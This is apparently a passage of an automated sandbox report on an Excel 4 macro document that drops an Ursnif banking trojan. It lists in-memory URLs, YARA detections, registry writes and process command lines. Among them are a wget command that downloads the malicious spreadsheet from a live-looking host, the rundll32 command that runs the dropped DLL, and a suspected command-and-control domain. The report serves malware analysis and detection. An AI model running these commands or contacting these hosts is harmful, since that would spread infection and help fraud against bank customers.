              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://lifecycle.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://login.microsoftonline.com/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://login.windows.local
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://management.azure.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://management.azure.com/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://messaging.office.com/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://ncus-000.contentsync.
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://ncus-000.pagecontentsync.
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://officeapps.live.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://officeci.azurewebsites.net/api/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://onedrive.live.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://onedrive.live.com/embed?
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://outlook.office.com/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://outlook.office365.com/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://powerlift.acompli.net
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://settings.outlook.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://shell.suite.office.com:1443
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://skyapi.live.net/Activity/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://store.office.cn/addinstemplate
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://store.office.com/addinstemplate
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://store.office.de/addinstemplate
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://store.officeppe.com/addinstemplate
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://tasks.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://templatelogging.office.com/client/log
              Source: rundll32.exe, 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmpString found in binary or memory: https://toldtonts.website
              Source: rundll32.exe, 00000004.00000003.928235723.0000000000DB1000.00000004.00000001.sdmpString found in binary or memory: https://toldtonts.website/
              Source: rundll32.exe, 00000004.00000003.928235723.0000000000DB1000.00000004.00000001.sdmpString found in binary or memory: https://toldtonts.website/E
              Source: rundll32.exe, 00000004.00000002.1088930017.0000000000DA6000.00000004.00000001.sdmp, ~DF6CC44F9D650874C3.TMP.17.drString found in binary or memory: https://toldtonts.website/index.htm
              Source: {ECA749BB-3EE3-11EB-90EB-ECF4BBEA1588}.dat.17.drString found in binary or memory: https://toldtonts.website/index.htmRoot
              Source: {ECA749BB-3EE3-11EB-90EB-ECF4BBEA1588}.dat.17.drString found in binary or memory: https://toldtonts.website/index.htmite/index.htm
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://web.microsoftstream.com/video/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://webshell.suite.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://wus2-000.contentsync.
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://wus2-000.pagecontentsync.
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://www.odwebp.svc.ms
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747278419.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748655251.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747986077.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748565990.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747784344.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748768619.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748706961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748439771.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747923961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747187809.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748882453.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747462773.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748866102.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1090108573.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748524369.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748742031.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747541752.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748483745.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747705654.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748046989.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748608001.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747851363.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.754701787.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748794995.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747089322.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747369834.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748817707.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748192310.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748306925.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748386504.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748126666.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748842412.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748249184.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6524, type: MEMORY

              E-Banking Fraud:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747278419.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748655251.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747986077.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748565990.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747784344.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748768619.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748706961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748439771.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747923961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747187809.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748882453.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747462773.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748866102.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1090108573.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748524369.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748742031.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747541752.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748483745.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747705654.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748046989.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748608001.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747851363.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.754701787.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748794995.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747089322.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747369834.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748817707.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748192310.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748306925.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748386504.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748126666.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748842412.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748249184.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6524, type: MEMORY

              System Summary:

              barindex
              Office process drops PE fileShow sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\rsfsv\drgd.dbvfJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].pngJump to dropped file
              Writes registry values via WMIShow sources
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
              Source: classification engineClassification label: mal84.troj.expl.evad.win@16/46@6/3
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:684:120:WilError_01
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{850317AA-8546-462C-B1FE-96E615861FA5} - OProcSessId.datJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from win32_process
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer
              Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls' > cmdline.out 2>&1
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls'
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
              Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5868 CREDAT:17410 /prefetch:2
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5412 CREDAT:17410 /prefetch:2
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls' Jump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServerJump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5868 CREDAT:17410 /prefetch:2Jump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5412 CREDAT:17410 /prefetch:2Jump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2Jump to behavior
              Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
              Source: Binary string: c:\CompanyLast\SideCircle\LawRoad\storyForm\numberEat\smell.pdb source: drgd.dbvf.3.dr
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\rsfsv\drgd.dbvfJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].pngJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].pngJump to dropped file
